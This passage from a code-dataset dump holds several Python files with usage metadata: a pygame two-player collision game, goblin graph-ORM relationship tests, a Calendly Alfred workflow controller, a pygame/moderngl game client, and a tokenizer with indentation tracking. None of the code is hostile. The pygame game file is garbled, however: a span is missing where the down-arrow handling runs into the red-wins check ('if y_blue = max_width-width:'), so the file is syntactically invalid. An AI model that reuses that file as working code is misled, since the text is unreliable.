"call"}, {"api_name": "torch.nn", "line_number": 85, "usage_type": "name"}, {"api_name": "torch.sum", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "4562480612", "text": "import pygame\r\nimport random\r\nimport time\r\n\r\n#initial window setup\r\npygame.init()\r\nmax_width = 1000\r\nmax_height = 500\r\nwin = pygame.display.set_mode((max_width,max_height))\r\npygame.display.set_caption(\"Test Game\")\r\n\r\n#win counter\r\nred_counter = 0\r\nblue_counter = 0\r\n\r\n#Fonts init\r\npygame.font.init() \r\nmyfont = pygame.font.SysFont('Comic Sans MS', 30)\r\ntextsurface = myfont.render(str(red_counter) + \":\" + str(blue_counter), False, (255, 255, 255))\r\n\r\n#First Init coordinates \r\nx_red = 30\r\ny_red = 50\r\nx_blue = 950\r\ny_blue = 50\r\nwidth = 20\r\nheight = 60\r\nvel = 15\r\n\r\n#run done\r\nrun = True\r\n\r\n#player initialisation\r\nplayer_red = pygame.Rect(x_red,y_red,width,height)\r\nplayer_blue = pygame.Rect(x_blue,y_blue,width,height)\r\n\r\nwhile run:\r\n pygame.time.delay(100)\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n run = False\r\n\r\n keys = pygame.key.get_pressed()\r\n \r\n #Red Player Movement Key Mapping wasd\r\n if keys[pygame.K_a]:\r\n if x_red > 0:\r\n x_red -= vel\r\n\r\n if keys[pygame.K_d]:\r\n if x_red < max_width-width:\r\n x_red += vel\r\n\r\n if keys[pygame.K_w]:\r\n if y_red > 0 :\r\n y_red -= vel\r\n\r\n if keys[pygame.K_s]:\r\n if y_red < max_height-height:\r\n y_red += vel\r\n\r\n #Blue Player Movement Key Mapping up,down,left,right arrow keys\r\n if keys[pygame.K_LEFT]:\r\n if x_blue >= -20 :\r\n x_blue -= vel\r\n\r\n if keys[pygame.K_RIGHT]:\r\n if x_blue < max_width-width : \r\n x_blue += vel\r\n\r\n if keys[pygame.K_UP]:\r\n if y_blue > 0 :\r\n y_blue -= vel\r\n\r\n if keys[pygame.K_DOWN]:\r\n if y_blue = max_width-width:\r\n print(\"RED WINS\")\r\n myfont1 = pygame.font.SysFont('Comic Sans MS', 60)\r\n textsurface = myfont1.render(\"RED WINS\", False, (255, 255, 255))\r\n win.blit(textsurface,(max_width/2 - 50,0))\r\n red_counter += 1\r\n #reset the player coordinates\r\n x_red = 50\r\n y_red = random.randint(50,450)\r\n y_red -= (y_red % 10)\r\n x_blue = 950\r\n y_blue = random.randint(50,450)\r\n y_blue -= (y_blue % 10)\r\n pygame.time.delay(1000) #delay in milliseconds\r\n win.fill((255,0,0))\r\n \r\n if 
x_blue <= -10:\r\n print(\"BLUE WINS\")\r\n myfont1 = pygame.font.SysFont('Comic Sans MS', 60)\r\n textsurface = myfont1.render(\"BLUE WINS\", False, (255, 255, 255))\r\n win.blit(textsurface,(max_width/2-50,0))\r\n blue_counter += 1\r\n #reset the player coordinates\r\n x_red = 50\r\n y_red = random.randint(50,450)\r\n y_red -= (y_red % 10)\r\n x_blue = 950\r\n y_blue = random.randint(50,450)\r\n y_blue -= (y_blue % 10)\r\n pygame.time.delay(1000) #delay in milliseconds\r\n win.fill((0,0,255))\r\n\r\n pygame.draw.rect(win, (255,0,0), player_red) \r\n pygame.draw.rect(win, (0,0,255), player_blue) \r\n # print(x_red,y_red)\r\n # print(x_blue,y_blue)\r\n pygame.display.update() \r\n\r\npygame.quit()", "repo_name": "agrawalparth08/collision-detection-pong", "sub_path": "collision_game.py", "file_name": "collision_game.py", "file_ext": "py", "file_size_in_byte": 3914, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.init", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.font.init", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 35, "usage_type": "call"}, {"api_name": "pygame.time.delay", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 40, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 59, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 68, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 83, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 84, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 85, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 86, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 86, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 91, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 94, "usage_type": "call"}, 
{"api_name": "pygame.font.SysFont", "line_number": 104, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 104, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 110, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 113, "usage_type": "call"}, {"api_name": "pygame.time.delay", "line_number": 115, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 115, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 120, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 120, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 126, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 129, "usage_type": "call"}, {"api_name": "pygame.time.delay", "line_number": 131, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 131, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 134, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 134, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 135, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 135, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 138, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 138, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 140, "usage_type": "call"}]} +{"seq_id": "34814088884", "text": "from __future__ import unicode_literals\nfrom nose.plugins.attrib import attr\nfrom copy import deepcopy\n\nfrom tornado.testing import gen_test\nfrom goblin._compat import print_\nfrom goblin.models import Vertex, Edge\nfrom goblin.properties import String, Integer\nfrom goblin.exceptions import GoblinRelationshipException\nfrom goblin.tests.base import BaseGoblinTestCase, TestVertexModel, counter\nfrom goblin.relationships.relationship import Relationship\n\n\nclass TestRelationshipEdgeModel(Edge):\n label = 'test_relationship_edge_model'\n\n name = String(default='test_edge')\n test_val = Integer(default=counter)\n\n\nclass TestRelationshipStringPlaceholderVertexModel(Vertex):\n label = 'test_placeholder_inspection'\n\n name = String(default='test_vertex')\n test_val = Integer(default=counter)\n\n relation = Relationship(\n TestRelationshipEdgeModel,\n \"goblin.tests.relationships_tests.vertex_relationship_io_tests.AnotherTestVertexModel\",\n 'out')\n\n\nclass AnotherTestVertexModel(Vertex):\n label = 'another_test_vertex_model'\n name = String(default='test_vertex')\n test_val = Integer(default=counter)\n\n\nclass TestRelationshipVertexModel(Vertex):\n label = 'test_relationship_vertex_model'\n\n name = String(default='test_vertex')\n test_val = Integer(default=counter)\n\n relation = Relationship(TestRelationshipEdgeModel, TestVertexModel, 'out')\n\n\n@attr('unit', 'relationship')\nclass GraphRelationshipVertexIOTestCase(BaseGoblinTestCase):\n \"\"\" Test Relationship Vertex IO Functionality \"\"\"\n\n @classmethod\n def setUpClass(cls):\n super(GraphRelationshipVertexIOTestCase, cls).setUpClass()\n cls.relationship_base_cls = Relationship\n cls.edge_model = TestRelationshipEdgeModel\n cls.vertex_model = TestRelationshipVertexModel\n cls.placeholder_model = TestRelationshipStringPlaceholderVertexModel\n\n @gen_test\n def test_instantiation(self):\n \"\"\" Test that the Relationship is properly Instantiated \"\"\"\n v1 = yield self.vertex_model.create(name='test relationship')\n try:\n # setup relationship\n 
self.assertIsNotNone(v1.relation.top_level_vertex_class)\n self.assertIsNotNone(v1.relation.top_level_vertex)\n self.assertEqual(v1.relation.top_level_vertex, v1)\n finally:\n yield v1.delete()\n\n @gen_test\n def test_follow_through(self):\n \"\"\" Test that the Relationship property functions \"\"\"\n\n v1 = yield self.vertex_model.create(name='test relationship')\n e1, v2 = yield v1.relation.create(\n vertex_params={'name': 'new relation'})\n try:\n stream = yield v1.outE(TestRelationshipEdgeModel)\n e1q = yield stream.read()\n e1q = e1q[0]\n stream = yield v1.outV(TestRelationshipEdgeModel)\n v2q = yield stream.read()\n v2q = v2q[0]\n self.assertEqual(e1, e1q)\n self.assertEqual(v2, v2q)\n finally:\n yield e1.delete()\n yield v1.delete()\n yield v2.delete()\n\n @gen_test\n def test_placeholder_inspection(self):\n \"\"\" Test that the Relationship property functions \"\"\"\n\n v1 = yield self.placeholder_model.create(name='test placeholder')\n e1, v2 = yield v1.relation.create(\n vertex_params={'name': 'another new relation'})\n try:\n stream = yield v1.outE(TestRelationshipEdgeModel)\n e1q = yield stream.read()\n e1q = e1q[0]\n stream = yield v1.outV(TestRelationshipEdgeModel)\n v2q = yield stream.read()\n v2q = v2q[0]\n self.assertEqual(e1, e1q)\n self.assertEqual(v2, v2q)\n finally:\n yield e1.delete()\n yield v1.delete()\n yield v2.delete()\n\n @attr('relationship_isolation')\n @gen_test\n def test_relationship_isolation(self):\n \"\"\" Test that the relationship adheres to instance methods \"\"\"\n\n v11 = yield self.vertex_model.create(name='test1')\n e1, v12 = yield v11.relation.create(\n vertex_params={'name': 'new_relation_1'})\n v21 = yield self.vertex_model.create(name='test2')\n e2, v22 = yield v21.relation.create(\n vertex_params={'name': 'new_relation_2'})\n try:\n stream = yield v11.relation.vertices()\n verts = yield stream.read()\n r11 = deepcopy(verts)\n print_(\"Vertex 1-1 relationships: {}\".format(r11))\n\n stream = yield v21.relation.vertices()\n verts = yield stream.read()\n r2 = deepcopy(verts)\n print_(\"Vertex 2-1 relationships: {}\".format(r2))\n\n with self.assertRaises(AssertionError):\n self.assertListEqual(r11, r2)\n\n stream = yield v11.relation.vertices()\n verts = yield stream.read()\n r12 = deepcopy(verts)\n print_(\"Vertex 1-1 relationships again: {}\".format(r12))\n with self.assertRaises(AssertionError):\n self.assertListEqual(r2, r12)\n\n self.assertListEqual(r11, r12)\n finally:\n yield v11.delete()\n yield v12.delete()\n yield v21.delete()\n yield v22.delete()\n", "repo_name": "ZEROFAIL/goblin-legacy", "sub_path": "goblin/tests/relationships_tests/vertex_relationship_io_tests.py", "file_name": "vertex_relationship_io_tests.py", "file_ext": "py", "file_size_in_byte": 5270, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 23, "dataset": "github-code", "pt": "52", "api": [{"api_name": "goblin.models.Edge", "line_number": 14, "usage_type": "name"}, {"api_name": "goblin.properties.String", "line_number": 17, "usage_type": "call"}, {"api_name": "goblin.properties.Integer", "line_number": 18, "usage_type": "call"}, {"api_name": "goblin.tests.base.counter", "line_number": 18, "usage_type": "name"}, {"api_name": "goblin.models.Vertex", "line_number": 21, "usage_type": "name"}, {"api_name": "goblin.properties.String", "line_number": 24, "usage_type": "call"}, {"api_name": "goblin.properties.Integer", "line_number": 25, "usage_type": "call"}, {"api_name": "goblin.tests.base.counter", "line_number": 25, "usage_type": "name"}, {"api_name": 
"goblin.relationships.relationship.Relationship", "line_number": 27, "usage_type": "call"}, {"api_name": "goblin.models.Vertex", "line_number": 33, "usage_type": "name"}, {"api_name": "goblin.properties.String", "line_number": 35, "usage_type": "call"}, {"api_name": "goblin.properties.Integer", "line_number": 36, "usage_type": "call"}, {"api_name": "goblin.tests.base.counter", "line_number": 36, "usage_type": "name"}, {"api_name": "goblin.models.Vertex", "line_number": 39, "usage_type": "name"}, {"api_name": "goblin.properties.String", "line_number": 42, "usage_type": "call"}, {"api_name": "goblin.properties.Integer", "line_number": 43, "usage_type": "call"}, {"api_name": "goblin.tests.base.counter", "line_number": 43, "usage_type": "name"}, {"api_name": "goblin.relationships.relationship.Relationship", "line_number": 45, "usage_type": "call"}, {"api_name": "goblin.tests.base.TestVertexModel", "line_number": 45, "usage_type": "argument"}, {"api_name": "goblin.tests.base.BaseGoblinTestCase", "line_number": 49, "usage_type": "name"}, {"api_name": "goblin.relationships.relationship.Relationship", "line_number": 55, "usage_type": "name"}, {"api_name": "tornado.testing.gen_test", "line_number": 60, "usage_type": "name"}, {"api_name": "tornado.testing.gen_test", "line_number": 72, "usage_type": "name"}, {"api_name": "tornado.testing.gen_test", "line_number": 93, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 128, "usage_type": "call"}, {"api_name": "goblin._compat.print_", "line_number": 129, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 133, "usage_type": "call"}, {"api_name": "goblin._compat.print_", "line_number": 134, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 141, "usage_type": "call"}, {"api_name": "goblin._compat.print_", "line_number": 142, "usage_type": "call"}, {"api_name": "nose.plugins.attrib.attr", "line_number": 114, "usage_type": "call"}, {"api_name": "tornado.testing.gen_test", "line_number": 115, "usage_type": "name"}, {"api_name": "nose.plugins.attrib.attr", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "22673551299", "text": "#!/usr/bin/python\n# encoding: utf-8\nimport constants as c\nfrom calendly_client import CalendlyClient, CalendlyClientException\nfrom calendly_client import active_filter as ACTIVE_FILTER\n\nfrom workflow import Workflow3\n\nlog = Workflow3().logger\n\n\nclass Controller:\n calendly_client = None\n\n def __init__(self, wf):\n access_token = wf.get_password(c.ACCESS_TOKEN)\n self.calendly_client = CalendlyClient(access_token)\n self.stats = Stats(wf)\n self.wf = wf\n\n def create_single_use_link(self, event_type):\n try:\n link = self.calendly_client.create_link(event_type, 1)\n self.stats.increment(event_type)\n return link\n\n except CalendlyClientException:\n raise Exception(\"Request to create link failed.\")\n\n def get_current_user(self):\n user = self.calendly_client.get_current_user()\n if user is None:\n raise Exception(\"Failed loading Event Types. 
Could not determine current user.\")\n\n return user\n\n def cache_ordered_event_types(self):\n user = self.get_current_user()\n ordered_event_types = self.get_ordered_event_types(user)\n self.wf.cache_data(c.CACHE_EVENT_TYPES, ordered_event_types)\n\n def get_ordered_event_types(self, user):\n\n unordered_event_types = self.calendly_client.get_all_event_types_of_user(user, the_filter=ACTIVE_FILTER)\n if not unordered_event_types:\n return []\n\n event_stats = self.stats.get_stats()\n if not event_stats:\n return unordered_event_types\n\n for event_stats_item in event_stats.items():\n for i in range(len(unordered_event_types)):\n needle = unordered_event_types[i]\n if needle[\"uri\"] == event_stats_item[0]:\n unordered_event_types[i][\"event_stats\"] = event_stats_item[1]\n\n ordered_event_types = sorted(unordered_event_types, key=lambda event_type: event_type[\"event_stats\"] if \"event_stats\" in event_type else None, reverse=True)\n\n return ordered_event_types\n\n\nclass Stats:\n\n def __init__(self, wf):\n event_stats = wf.settings.get(c.CONF_EVENT_STATS)\n if event_stats is None:\n wf.settings[c.CONF_EVENT_STATS] = {}\n\n self.wf = wf\n\n def increment(self, event_type):\n log.debug(\"in: Incrementing Stats for %s\" % event_type)\n if event_type in self.wf.settings[c.CONF_EVENT_STATS]:\n current_count = self.wf.settings[c.CONF_EVENT_STATS][event_type]\n self.wf.settings[c.CONF_EVENT_STATS][event_type] = current_count + 1\n else:\n self.wf.settings[c.CONF_EVENT_STATS][event_type] = 1\n\n self.wf.settings.save()\n\n def get_stats(self):\n return self.wf.settings[c.CONF_EVENT_STATS]\n\n\n", "repo_name": "sebwarnke/alfred-calendly", "sub_path": "src/controller.py", "file_name": "controller.py", "file_ext": "py", "file_size_in_byte": 2787, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "52", "api": [{"api_name": "workflow.Workflow3", "line_number": 9, "usage_type": "call"}, {"api_name": "constants.ACCESS_TOKEN", "line_number": 16, "usage_type": "attribute"}, {"api_name": "calendly_client.CalendlyClient", "line_number": 17, "usage_type": "call"}, {"api_name": "calendly_client.CalendlyClientException", "line_number": 27, "usage_type": "name"}, {"api_name": "constants.CACHE_EVENT_TYPES", "line_number": 40, "usage_type": "attribute"}, {"api_name": "calendly_client.active_filter", "line_number": 44, "usage_type": "name"}, {"api_name": "constants.CONF_EVENT_STATS", "line_number": 66, "usage_type": "attribute"}, {"api_name": "constants.CONF_EVENT_STATS", "line_number": 68, "usage_type": "attribute"}, {"api_name": "constants.CONF_EVENT_STATS", "line_number": 74, "usage_type": "attribute"}, {"api_name": "constants.CONF_EVENT_STATS", "line_number": 75, "usage_type": "attribute"}, {"api_name": "constants.CONF_EVENT_STATS", "line_number": 76, "usage_type": "attribute"}, {"api_name": "constants.CONF_EVENT_STATS", "line_number": 78, "usage_type": "attribute"}, {"api_name": "constants.CONF_EVENT_STATS", "line_number": 83, "usage_type": "attribute"}]} +{"seq_id": "5400179064", "text": "import pygame as pg\nimport moderngl as mgl\n\nfrom .pymgl.graphics_engine import GraphicsEngine\nfrom .pyfont.font import Font\n\nfrom .util.asset_loader import load_character_assets, load_attack_assets, load_keybinds, load_bgs\n\n# import menus #\nfrom .menus import *\n\n\nclass _Settings:\n RESOLUTION = (1280,720)\n MENU_MAP = {\n 'start': 0,\n 'main': 1,\n 'select': 2,\n 'fight': 3\n }\n\n\nclass Client:\n def __init__(self):\n self._pg_init()\n 
self._create_menus()\n self._asset_load_progress = 0\n self.finished_loading = False\n self._load_assets()\n \n def _pg_init(self):\n # init\n pg.init()\n\n # get window and ctx\n self.resolution = _Settings.RESOLUTION\n # self.screen = pg.display.set_mode(self.resolution)\n pg.display.set_mode(self.resolution, pg.OPENGL | pg.DOUBLEBUF)\n self.ctx = mgl.create_context()\n self.ctx.enable(mgl.BLEND)\n self.ctx.blend_func = (\n mgl.SRC_ALPHA, mgl.ONE_MINUS_SRC_ALPHA\n )\n pg.display.set_caption('The UW Experience')\n\n # get graphics engine, font, and displays\n self.graphics_engine = GraphicsEngine(self.ctx, self.resolution, './src')\n self.font = Font(pg.image.load('./src/pyfont/font.png').convert())\n self.displays = {\n 'default': pg.Surface(self.resolution),\n 'gaussian_blur': pg.Surface(self.resolution),\n 'black_alpha': pg.Surface(self.resolution)\n }\n self.displays['gaussian_blur'].set_colorkey((0,0,0))\n self.displays['black_alpha'].set_colorkey((0,0,0))\n\n # clock\n self.clock = pg.time.Clock()\n\n def _create_menus(self):\n # menus\n self.menus : list[Menu] = [\n StartMenu(self), \n MainMenu(self),\n SelectMenu(self),\n FightMenu(self)\n ]\n self.current_menu = 0\n \n def _load_assets(self):\n if self._asset_load_progress == 0:\n # cursor\n pg.mouse.set_visible(False)\n self.cursor = pg.image.load('./assets/ui/cursor.png').convert()\n self.cursor.set_colorkey((0,0,0))\n \n keybinds = load_keybinds()\n self.keybinds = {\n 'f1': {key: pg.key.key_code(keybinds['f1'][key]) for key in keybinds['f1']},\n 'f2': {key: pg.key.key_code(keybinds['f2'][key]) for key in keybinds['f2']},\n }\n\n self.bgs = {}\n self.bg_thumbs = {}\n self.character_assets = {}\n self.accessory_assets = {}\n self.attack_assets = {}\n\n bgs, bg_thumbs = load_bgs(progress=self._asset_load_progress)\n self.bgs = {\n **self.bgs,\n **bgs\n }\n self.bg_thumbs = {\n **self.bg_thumbs,\n **bg_thumbs\n }\n \n # assets\n character_assets, accessory_assets = load_character_assets(scale=3, progress=self._asset_load_progress)\n self.character_assets = {\n **self.character_assets,\n **character_assets\n }\n self.accessory_assets = {\n **self.accessory_assets,\n **accessory_assets\n }\n attack_assets = load_attack_assets(scale=3, progress=self._asset_load_progress)\n self.attack_assets = {\n **self.attack_assets,\n **attack_assets\n }\n\n if (\n not bgs and\n not character_assets and\n not accessory_assets and \n not attack_assets\n ):\n self.finished_loading = True\n\n self._asset_load_progress += 1\n\n def update(self):\n dt = self.clock.get_time() / 1000\n events = pg.event.get()\n\n for event in events:\n if event.type == pg.QUIT:\n return {\n 'exit': True\n }\n if event.type == pg.KEYDOWN and event.key == pg.K_ESCAPE:\n return {\n 'exit': True\n }\n \n if not self.finished_loading:\n self._load_assets()\n self.menus[self.current_menu].transition_time = 0\n \n return self.menus[self.current_menu].update(events, dt)\n\n def render(self):\n self.ctx.clear(0.08, 0.1, 0.2)\n displays_to_render = self.menus[self.current_menu].render()\n if not self.finished_loading:\n self.font.render(\n self.displays['black_alpha'],\n f\"loading{'.' 
* (self._asset_load_progress % 3 + 1)}\",\n self.resolution[0] / 2 - 125,\n self.resolution[1] / 2,\n (255,255,255),\n 25,\n style='left'\n )\n [\n self.graphics_engine.render(\n self.displays[display], \n self.displays[display].get_rect(), \n shader=display\n ) \n for display in displays_to_render\n ]\n # [self.screen.blit(self.displays[display], (0,0)) for display in displays_to_render]\n \n def run(self):\n self.menus[self.current_menu].on_load()\n while True:\n exit_status = self.update()\n if exit_status:\n if exit_status['exit']:\n pg.quit()\n return\n else:\n if exit_status['goto'] == 'fight':\n self.menus[_Settings.MENU_MAP['fight']].reset_fight_data()\n self.menus[_Settings.MENU_MAP['fight']].get_fight_data(self.menus[_Settings.MENU_MAP['select']])\n if exit_status['goto'] == 'select':\n self.menus[_Settings.MENU_MAP['select']].reset_meta_data()\n\n self.current_menu = _Settings.MENU_MAP[exit_status['goto']]\n self.menus[self.current_menu].on_load()\n \n self.render()\n self.clock.tick()\n pg.display.flip()\n", "repo_name": "HuMangoPP/theUWexp", "sub_path": "src/client.py", "file_name": "client.py", "file_ext": "py", "file_size_in_byte": 6010, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.init", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.OPENGL", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.DOUBLEBUF", "line_number": 38, "usage_type": "attribute"}, {"api_name": "moderngl.create_context", "line_number": 39, "usage_type": "call"}, {"api_name": "moderngl.BLEND", "line_number": 40, "usage_type": "attribute"}, {"api_name": "moderngl.SRC_ALPHA", "line_number": 42, "usage_type": "attribute"}, {"api_name": "moderngl.ONE_MINUS_SRC_ALPHA", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pymgl.graphics_engine.GraphicsEngine", "line_number": 47, "usage_type": "call"}, {"api_name": "pyfont.font.Font", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 50, "usage_type": "call"}, {"api_name": "pygame.Surface", "line_number": 51, "usage_type": "call"}, {"api_name": "pygame.Surface", "line_number": 52, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 58, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pygame.mouse.set_visible", "line_number": 73, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 73, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 74, "usage_type": "attribute"}, {"api_name": "util.asset_loader.load_keybinds", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.key.key_code", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.key.key_code", "line_number": 80, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 80, 
"usage_type": "attribute"}, {"api_name": "util.asset_loader.load_bgs", "line_number": 89, "usage_type": "call"}, {"api_name": "util.asset_loader.load_character_assets", "line_number": 100, "usage_type": "call"}, {"api_name": "util.asset_loader.load_attack_assets", "line_number": 109, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 127, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 127, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 130, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 134, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 134, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 174, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 188, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 188, "usage_type": "attribute"}]} +{"seq_id": "8376421883", "text": "from __future__ import annotations\n\nimport collections\nfrom typing import Iterator, Optional\n\nfrom gvm.language.grammar import Grammar, TokenID\nfrom gvm.language.syntax import SyntaxToken\nfrom gvm.locations import Location\n\n\nclass Scanner:\n \"\"\"\n This class is implemented tokenizer, that tokenize input stream to tokens.\n\n This tokenizer returns all tokens from source text, e.g. trivia, errors and e.t.c\n \"\"\"\n\n eof_id: TokenID\n error_id: TokenID\n\n def __init__(self, grammar: Grammar, filename: str, content: str):\n self.grammar = grammar\n self.position = 0\n self.buffer = content\n self.length = len(self.buffer)\n self.location = Location(filename)\n self.eof_id = grammar.tokens['']\n self.error_id = grammar.tokens['']\n\n def tokenize(self) -> Iterator[SyntaxToken]:\n while self.position < self.length:\n token = self.__match()\n if token:\n yield token\n\n yield SyntaxToken(self.eof_id, \"\", self.location)\n\n def __match(self) -> Optional[SyntaxToken]:\n self.location.columns(1)\n self.location = self.location.step()\n\n # match patterns\n results = ((pattern.token_id, pattern.match(self.buffer, self.position)) for pattern in self.grammar.patterns)\n results = tuple((token_id, match) for token_id, match in results if match)\n if results:\n max_position = max(match.end() for _, match in results)\n token_id, match = next((token_id, match) for token_id, match in results if match.end() == max_position)\n position = match.end()\n value = self.buffer[self.position:position]\n else:\n # match operators\n value = self.buffer[self.position]\n token_id = self.error_id\n self.position += 1\n\n self.position += len(value)\n location = self.__consume_location(value)\n return SyntaxToken(token_id, value, location)\n\n def __consume_location(self, value):\n for c in value[:-1]:\n if c == '\\n':\n self.location = self.location.lines(1)\n elif len(value) > 1:\n self.location = self.location.columns(1)\n location = self.location\n if value[-1] == '\\n':\n self.location = self.location.lines(1)\n else:\n self.location = self.location.columns(1)\n return location\n\n def __iter__(self):\n return self.tokenize()\n\n\nclass DefaultScanner(Scanner):\n \"\"\" This class is implemented tokenizer, that skipped trivia tokens from output tokens \"\"\"\n\n def tokenize(self) -> Iterator[SyntaxToken]:\n for token in super().tokenize():\n if token.id not in self.grammar.trivia:\n yield token\n\n\nclass IndentationScanner(Scanner):\n \"\"\"\n This class is implemented tokenizer, that tracks indentations in source text (offset rule) and\n appended 
`indent` and `dedent` tokens to output tokens. Also skipped trivia tokens\n    \"\"\"\n\n    def __init__(self, grammar: Grammar, filename: str, content: str):\n        super().__init__(grammar, filename, content)\n\n        self.newline_id = grammar.add_token('NewLine')\n        self.whitespace_id = grammar.add_token('Whitespace')\n        self.indent_id = grammar.add_token('Indent')\n        self.dedent_id = grammar.add_token('Dedent')\n\n    def tokenize(self) -> Iterator[SyntaxToken]:\n        indentations = collections.deque([0])\n        is_new = True # new line\n        whitespace = None\n        level = 0 # disable indentation\n\n        for token in super().tokenize():\n            # new line\n            if token.id == self.newline_id:\n                if level:\n                    continue\n\n                if not is_new:\n                    yield token\n\n                is_new = True\n                continue\n\n            elif token.id == self.whitespace_id:\n                if is_new:\n                    whitespace = token\n                    continue\n\n            elif token.id == self.eof_id:\n                location = Location(token.location.filename, token.location.end, token.location.end)\n\n                if not is_new:\n                    yield SyntaxToken(self.newline_id, '', location)\n\n                while indentations[-1] > 0:\n                    yield SyntaxToken(self.dedent_id, '', location)\n                    indentations.pop()\n\n                yield token\n                continue\n\n            elif token.id in self.grammar.trivia:\n                continue\n\n            if is_new:\n                if whitespace:\n                    indent = len(whitespace.value)\n                    location = whitespace.location\n                    whitespace = None\n                else:\n                    indent = 0\n                    location = Location(token.location.filename, token.location.begin, token.location.begin)\n\n                if indentations[-1] < indent:\n                    yield SyntaxToken(self.indent_id, '', location)\n                    indentations.append(indent)\n                else:\n                    while indentations[-1] > indent:\n                        yield SyntaxToken(self.dedent_id, '', location)\n                        indentations.pop()\n\n            is_new = False\n            if token.id in self.grammar.open_brackets:\n                level += 1\n            elif token.id in self.grammar.close_brackets:\n                level -= 1\n\n            yield token\n", "repo_name": 